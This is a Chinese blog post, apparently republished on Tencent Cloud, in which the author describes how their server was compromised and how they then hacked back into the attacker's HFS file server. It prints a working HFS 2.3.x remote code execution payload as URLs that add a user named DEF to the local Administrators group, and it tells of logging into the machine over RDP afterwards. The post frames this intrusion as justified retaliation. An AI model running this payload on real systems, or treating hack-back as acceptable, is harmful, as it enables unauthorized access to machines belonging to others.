前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >自己的服务器被抓鸡,看我如何反击

自己的服务器被抓鸡,看我如何反击

作者头像
HACK学习
发布2020-03-12 19:01:26
1.7K0
发布2020-03-12 19:01:26
举报
文章被收录于专栏:HACK学习HACK学习

脚本黑客的服务器桌面截图

如何渗透进去的呢

0X00 科普HFS

先来科普一下:

HFS是什么?

HFS网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。

0X01 事情原因

今天我发现我自己练习用的服务器被别人挂了一句话木马

(我没有修改phpstudy的mysql数据库默认密码),一定要注意弱口令和及时更改默认密码

如图打开主页成这样的了都是些数据库的日志应该是被黑客给搞了

(太可怕了),怪自己太疏忽。

我在里面发现了一些奇怪的下载连接,判断了下,应该是下载木马的连接

然后我通过浏览器访问了下该地址,发现是一个HFS的程序

然后发现上面全是木马exe,可能是脚本小子用来抓肉鸡用的

我记得没错的话。HFS2.3.X有个远程代码执行的漏洞

Payload:

代码语言:javascript
复制
http://127.0.0.1/?search==%00{.exec|cmd /c net user DEF DEFHACKER123 /add.} http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators DEF /add.}

0X02 反击

HFS2.3.X代码执行的利用工具,我从网上下载了一个

成功执行了命令,添加了一个用户

然后我直接3389上去看了下

0X03 后续

这台服务器的归属运营商,我向客服说明了情况,希望他们处理下该问题

下面是我与网站客服的聊天截图

最后,希望大家不要利用技术来做非法的事情

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-02-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档